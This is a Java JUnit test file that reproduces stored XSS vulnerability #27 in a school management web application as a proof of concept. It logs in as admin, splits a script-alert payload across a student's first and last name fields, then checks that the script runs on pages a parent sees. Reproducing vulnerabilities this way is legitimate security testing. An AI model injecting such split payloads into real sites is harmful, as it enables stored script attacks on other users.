package tests.suite;

import com.gargoylesoftware.htmlunit.ScriptException;
import net.sourceforge.jwebunit.junit.WebTester;
import org.aeonbits.owner.ConfigFactory;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import tests.utilities.Environment;
import tests.utilities.Helper;

import java.io.IOException;

import static org.junit.Assert.assertTrue;

/**
 * Proof of concept for the XSS vulnerability #27, similar to {@link Vulnerability24}.
 * <h1>$studentid[1] $studentid[2]'s Classes</h1>
 *
 * @author Davide Pedranz
 */
public final class Vulnerability27 {

    // dependencies
    private WebTester tester;
    private Helper helper;

    @Before
    public void prepare() {
        final Environment environment = ConfigFactory.create(Environment.class, System.getenv());
        tester = new WebTester();
        tester.setBaseUrl(environment.baseURL());
        helper = new Helper(environment, tester);
    }

    @Test
    public void test() {

        // this is a stored XSS vulnerability... login as admin
        helper.loginAsAdmin();

        // edit the student (vulnerable form)
        tester.clickLinkWithText("Students");
        tester.assertMatch("Manage Students");
        tester.setWorkingForm("students");
        tester.checkCheckbox("delete[]");
        tester.clickButtonWithText("Edit");
        tester.setWorkingForm("editstudent");
        tester.setTextField("fname", "<script>alert(\""); // xss string
        tester.setTextField("lname", "x\");</script>q");  // xss string [cont]

        // workaround: the attack creates invalid HTML on this page
        try {
            tester.clickButtonWithText("Edit Student");
        } catch (RuntimeException e) {
            assertTrue(e.getCause() instanceof ScriptException);
            assertTrue(e.getMessage().contains("unterminated string literal"));
        }

        // now login as parent...
        // ... as a side effect, the script is present also here... just ignore it for now
        // since the vulnerability is reported for the next page
        try {
            tester.setExpectedJavaScriptAlert(" x");
            helper.loginAsParent();
        } catch (RuntimeException e) {
            // ignore this
            assertTrue(e.getCause() instanceof ScriptException);
            assertTrue(e.getMessage().contains("Exception invoking alert"));
        }
        tester.assertMatch("Students of parent parent");

        // NB: here we have one extra more, but still the code was executed
        tester.clickElementByXPath("html//a[@class='items']");
        tester.assertNoMatch("<script>alert(\" x\")</script>");
    }

    @After
    public void cleanup() throws IOException {
        helper.cleanupTestStudent();
    }
}
